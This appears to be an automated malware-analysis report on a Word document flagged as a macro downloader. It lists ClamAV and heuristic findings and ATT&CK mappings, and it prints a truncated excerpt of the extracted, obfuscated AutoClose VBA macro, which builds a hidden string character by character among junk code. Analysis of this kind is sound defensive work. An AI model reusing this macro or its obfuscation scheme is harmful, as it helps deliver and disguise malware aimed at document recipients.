Verdict: MALICIOUS
Risk Score: 222

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample contains a VBA macro with an AutoClose subroutine, which is a common technique for executing malicious code upon document opening. Heuristics indicate the use of GetObject, suggesting the macro likely downloads and executes a second-stage payload. The ClamAV detection name 'Doc.Downloader.Valyria-6595163-0' further supports this analysis.
Heuristics (7)
- ClamAV: Doc.Downloader.Valyria-6595163-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.Valyria-6595163-0
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- Auto_Close macro [high, OLE_VBA_AUTOCLOSE]: Auto_Close macro
- GetObject call [high, OLE_VBA_GETOBJ]: GetObject call
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 88612 bytes |

SHA-256 of macros.bas: 39ae170ebf6e421095e22ab8f26fbd386ba968db65ee1fd5c6be4a453d551e58
Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub DlOSeGyQuHYlYCoroJiL()
cYnOvAHeCATI = 97631
JIGaVErUpoPOJExer = 85777
Dim sJejYxObiLIWEBESb
sJejYxObiLIWEBESb = Log(6)
sJejYxObiLIWEBESb = sJejYxObiLIWEBESb + Log(10)
Dim meYhOReSiPYdyWu
meYhOReSiPYdyWu = Rnd(107)
MikepuPOpOkaF = InStr("PYXIkEJAWadOb", "PYXIkEJAWadObPYXIkEJAWadOb")
BodOPOfOlIzUGaBU = 65340
If meYhOReSiPYdyWu > 54505 Then
meYhOReSiPYdyWu = Exp(7)
End If
kOGAXAWyBIBuCAcog = InStr("wivotnIXaruda", "wivotnIXarudawivotnIXaruda")
End Sub
Sub AutoClose()
wGyCyneLAxImiJuiyraDE = InStr("zOCuLESYJyhaRUtAbo", "zOCuLESYJyhaRUtAbozOCuLESYJyhaRUtAbo")
Dim tIziRebejuV
tIziRebejuV = Log(6)
tIziRebejuV = tIziRebejuV + Log(10)
Dim JAXoNepIpGaqASueWecA
JAXoNepIpGaqASueWecA = Log(9)
JAXoNepIpGaqASueWecA = JAXoNepIpGaqASueWecA + Log(12)
On Error Resume Next
Dim DyguSASiaheHafU
For DyguSASiaheHafU = 5 To 11
Dim SimEfuSyhiGY
SimEfuSyhiGY = Fix(54506)
Next
iEmuBEryzYJyQo = InStr("LOryKOiahoNusCABUQOaUq", "LOryKOiahoNusCABUQOaUqLOryKOiahoNusCABUQOaUq")
Dim WoXyqiQIJuCazoR
For WoXyqiQIJuCazoR = 1 To 12
Dim jMUlEqIsoVeFAzEpO
jMUlEqIsoVeFAzEpO = Fix(17868)
Next
zonYzeCOPENVABuvav = Val("48168.2") & "nuaiQaGumuKulUx"
Debug.Print "SuDxABYwiGeZiaY"
Dim HQEixaXNONOGyqYTE
For HQEixaXNONOGyqYTE = 2 To 13
Dim kyGaaibASDetKaRon
kyGaaibASDetKaRon = Fix(94908)
Next
Dim GLYxAfOiMaVUd
GLYxAfOiMaVUd = Log(9)
GLYxAfOiMaVUd = GLYxAfOiMaVUd + Log(10)
hocAIMAmuDuGIq = 44641
TiduJyQESeHYXs = ""
Dim VYhuWAkYWudAq
VYhuWAkYWudAq = Log(2)
VYhuWAkYWudAq = VYhuWAkYWudAq + Log(13)
sukiWIniQOc = 33013
NYfYZoCaPyZOcYXalAtYsei = 14162
zkOhEGadoTiJaxyTeFipoQY = 99530
jajyKIqydEzXaSCENMI = InStr("iuaUPAviFpuFOWa", "iuaUPAviFpuFOWaiuaUPAviFpuFOWa")
VUTUbOJiHucYbAwEDABAaz = InStr("NyurOwUBIISEiOtAXIkwy", "NyurOwUBIISEiOtAXIkwyNyurOwUBIISEiOtAXIkwy")
Debug.Print "QyQyqURAmIsEsO"
iYtsUGEwOwIHuPenYsovEVE = InStr("XAfUWUXovywinif", "XAfUWUXovywinifXAfUWUXovywinif")
Dim OJUtavEruSIKeFA
OJUtavEruSIKeFA = Rnd(132)
If OJUtavEruSIKeFA > 32865 Then
OJUtavEruSIKeFA = Exp(2)
End If
TiduJyQESeHYXs = TiduJyQESeHYXs + IIf((165 + 330) = 495, "s", "e")
Debug.Print "ROBucytYReZirYF"
piKUCoCyhaSYxeyPIQiFu = 44799
TiduJyQESeHYXs = TiduJyQESeHYXs + IIf((303 + 606) = 909, "c", "KO0K")
Debug.Print "ZEKlyvzir"
sjYXaloGyHeWVUcOTYq = Val("12011.8") & "vUrIhOgJatyDY"
TiduJyQESeHYXs = TiduJyQESeHYXs + IIf((223 + 446) = 669, "r", "MkEU")
Dim juVeSidudeJYlY
juVeSidudeJYlY = Rnd(102)
If juVeSidudeJYlY > 10619 Then
juVeSidudeJYlY = Exp(2)
End If
Debug.Print "bAtOKEcuwYjuMOpYpu"
XutubiIJUNihanuZ = Val("35444.5") & "zAhIzywOxyNyNaSaqa"
Dim VYruSIWuPKdudpezu
VYruSIWuPKdudpezu = Rnd(126)
If VYruSIWuPKdudpezu > 54634 Then
VYruSIWuPKdudpezu = Exp(6)
End If
Debug.Print "BodaaowarOXEwupg"
rIzedEjoLAtEcUDys = Val("41567.3") & "QecExYwiFeKEVIXtRilA"
FYNoTubigYaIHEZ = Val("15642.10") & "iEHIVaPApaWAWfOHahU"
ZEVLiRIxyhaiYSECUkAn = 63633
TiduJyQESeHYXs = TiduJyQESeHYXs + IIf((77 + 154) = 231, "i", "l")
FytYkaxyCeJTZugu = 65881
Dim NUdHuGOgesI
NUdHuGOgesI = Log(4)
NUdHuGOgesI = NUdHuGOgesI + Log(13)
dEPyRUxUiyCehihUgoSIgI = 55707
Dim bOcUtagqREbi
lAiuiaBYMAqYSafiPApo = 83638
bOcUtagqREbi = Log(6)
bOcUtagqREbi = bOcUtagqREbi + Log(12)
QePOKiwOQodiVecI = 35616
Dim vJIZyzUPOGxy
vJIZyzUPOGxy = Rnd(1010)
If vJIZyzUPOGxy > 36436 Then
vJIZyzUPOGxy = Exp(10)
End If
TiduJyQESeHYXs = TiduJyQESeHYXs + IIf((83 + 166) = 249, "p", "AI")
FOQEnEMyHyladuay = 62758
Dim tImIDepaJekadynoBULi
tImIDepaJekadynoBULi = Log(5)
tImIDepaJekadynoBULi = tImIDepaJekadynoBULi + Log(13)
Debug.Print "upOlgOFyZVEkyWo"
Debug.Print "kUtOpEMUTogAJiZ"
Dim FUFEaIxyyDaweZeZi
FUFEaIxyyDaweZeZi = Log(3)
FUFEaIxyyDaweZeZi = FUFEaIxyyDaweZeZi + Log(11)
TiduJyQESeHYXs = TiduJyQESe
... (truncated)